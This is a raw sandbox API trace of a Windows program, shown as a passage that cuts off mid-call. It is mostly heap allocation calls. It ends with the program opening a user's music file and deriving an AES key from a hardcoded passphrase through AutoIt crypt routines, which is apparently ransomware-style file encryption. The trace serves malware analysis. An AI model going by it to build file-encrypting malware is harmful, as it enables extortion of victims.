Flags=0x0, Size=0x10) returned 0x43ca880 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0112.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0112.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0112.172] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0112.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0112.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.174] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.174] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.174] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0112.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0112.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0112.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca1a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0112.176] CloseHandle (hObject=0x298) returned 1 [0112.176] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.177] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0112.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dd97f0, ftCreationTime.dwHighDateTime=0x1d5ead4, ftLastAccessTime.dwLowDateTime=0x1883d600, ftLastAccessTime.dwHighDateTime=0x1d5e189, ftLastWriteTime.dwLowDateTime=0x1883d600, ftLastWriteTime.dwHighDateTime=0x1d5e189, nFileSizeHigh=0x0, nFileSizeLow=0x5975, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="dle rck7Umm-.wav", cAlternateFileName="DLERCK~1.WAV")) returned 0x41ac2c0 [0112.177] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0112.177] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.177] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0112.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0112.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0112.177] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.178] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0112.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.178] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0112.179] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0112.179] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0112.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa18, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0112.179] CryptHashData (hHash=0x41ac040, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0112.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.179] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0112.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0112.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca9a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0112.179] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41abfc0) returned 1 [0112.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, 